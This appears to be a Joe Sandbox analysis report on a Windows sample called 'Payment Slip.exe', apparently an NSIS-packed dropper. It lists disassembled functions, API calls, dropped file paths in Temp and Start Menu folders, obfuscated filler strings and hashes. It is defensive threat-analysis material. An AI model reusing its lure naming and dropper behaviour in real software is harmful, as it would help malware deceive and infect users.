Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: AddressHandleLibraryLoadModuleProc
String ID:
API String ID: 310444273-0
Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9

Function 004038B2 Relevance: 49.2, APIs: 15, Strings: 13, Instructions: 216
stringregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280

lstrcatW.KERNEL32(1033,004226D0), ref: 00403933
lstrlenW.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
lstrcmpiW.KERNEL32(?,.exe,: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
GetFileAttributesW.KERNEL32(: Completed), ref: 004039D1
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes), ref: 00403A1A

Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C

RegisterClassW.USER32(00428180), ref: 00403A57
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
ShowWindow.USER32(00000005,00000000), ref: 00403ADA
LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AEB
LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
RegisterClassW.USER32(00428180), ref: 00403B1C
DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B

Strings

RichEd32, xrefs: 00403AF1
Control Panel\Desktop\ResourceLocale, xrefs: 004038E6
RichEdit, xrefs: 00403B0D
"C:\Users\user\Desktop\Payment Slip.exe", xrefs: 004038B5
C:\Users\user\AppData\Local\Temp\, xrefs: 004038BE
_Nb, xrefs: 00403A36, 00403A9E
: Completed, xrefs: 0040397A, 00403983, 00403991, 004039E0, 004039E6
.exe, xrefs: 004039C0
1033, xrefs: 004038D2, 0040392E
RichEdit20W, xrefs: 00403AFE, 00403B04
.DEFAULT\Control Panel\International, xrefs: 0040391E
RichEd20, xrefs: 00403AE6
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00403942, 0040394A, 004039ED, 004039F3, 00403A03

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Payment Slip.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 914957316-626271727
Opcode ID: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction ID: 7b2c8f7aec5f024c70211f55c02b660a410cf4becd836ab4c66ac285f40ceed6
Opcode Fuzzy Hash: 944dc6c03719ae45e44b3d46cd84eabff06a9ed2df0d9f5219aeaae38ab8ce66
Instruction Fuzzy Hash: 5A61A470644201BAE320AF669C46F3B3A6CEB44749F40457FF941B62E2DB7C6902CA6D

Function 00403C55 Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C91
ShowWindow.USER32(?), ref: 00403CAE
DestroyWindow.USER32 ref: 00403CC2
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CDE
GetDlgItem.USER32(?,?), ref: 00403CFF
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D13
IsWindowEnabled.USER32(00000000), ref: 00403D1A
GetDlgItem.USER32(?,00000001), ref: 00403DC8
GetDlgItem.USER32(?,00000002), ref: 00403DD2
SetClassLongW.USER32(?,000000F2,?), ref: 00403DEC
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3D
GetDlgItem.USER32(?,00000003), ref: 00403EE3
ShowWindow.USER32(00000000,?), ref: 00403F04
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F16
EnableWindow.USER32(?,?), ref: 00403F31
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F47
EnableMenuItem.USER32(00000000), ref: 00403F4E
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F66
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F79
lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA2
SetWindowTextW.USER32(?,004226D0), ref: 00403FB6
ShowWindow.USER32(?,0000000A), ref: 004040EA

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID:
API String ID: 3282139019-0
Opcode ID: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction ID: 4e076ec7db8712f1269b31be3a161a6c229bb752fad246b02f2b6bf34ba01b4a
Opcode Fuzzy Hash: 58ab62fde9f499ba62d07c3a6c70f2588c0a9981729e988da1906f3edcdd1a2b
Instruction Fuzzy Hash: 5BC1D271A04205BBDB206F61ED49E3B3A69FB89745F40053EF601B11F1CB799852DB2E

Function 00402DBA Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 203
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402DCE
GetModuleFileNameW.KERNEL32(00000000,00437800,00000400), ref: 00402DEA

Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,00437800,80000000,00000003), ref: 00405B58
Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A

GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,00437800,00437800,80000000,00000003), ref: 00402E33
GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A

Strings

Error launching installer, xrefs: 00402E0A
Null, xrefs: 00402EB3
Inst, xrefs: 00402EA1
"C:\Users\user\Desktop\Payment Slip.exe", xrefs: 00402DC3
soft, xrefs: 00402EAA
C:\Users\user\AppData\Local\Temp\, xrefs: 00402DC7, 00402F92
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403011
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402FC3
C:\Users\user\Desktop, xrefs: 00402E15, 00402E1A, 00402E20

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: "C:\Users\user\Desktop\Payment Slip.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-1644656755
Opcode ID: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction ID: 1f6ec37bde34587697a274125597031aed9c17e441137146a4e3b0792cc80405
Opcode Fuzzy Hash: 5ecfa0d291b3e3150ad885ea31258d267a33d06369396b94df2ca3b34bcc353b
Instruction Fuzzy Hash: 3761F431940205ABDB20EF65DD89AAE3BB8AB04355F20417BF600B32D1D7B89E41DB9C

Function 00401752 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,?,00000031), ref: 004017B8

Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5

Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00401781
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor, xrefs: 00401818, 00401834
"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac", xrefs: 00401770, 00401779, 00401786, 00401798, 004017A4, 004017DA, 004017F0, 0040180E, 0040184A, 004018CB, 004018D4, 004018DE, 004018E9

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
API String ID: 1941528284-4085916267
Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

Function 00405192 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D

Strings

Completed, xrefs: 004051B3, 004051C3, 004051C9, 004051EC, 004051F8

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

Function 0040317B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403190

Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
WriteFile.KERNELBASE(0040BE78,00410F02,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
SetFilePointer.KERNELBASE(00139715,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: File$Pointer$CountTickWrite
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 2146148272-2559241417
Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

Function 004015B9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 004059EC
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09

CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,00000000,000000F0), ref: 00401630

Strings

C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00401623

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
API String ID: 3751793516-449055245
Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

Function 0040638E Relevance: 7.7, APIs: 4, Strings: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd

Similarity

API ID:
String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
API String ID: 0-2559241417
Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

Function 00402B78 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
RegCloseKey.ADVAPI32(?), ref: 00402BDE
RegCloseKey.ADVAPI32(?), ref: 00402C03
RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21

Memory Dump Source

Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
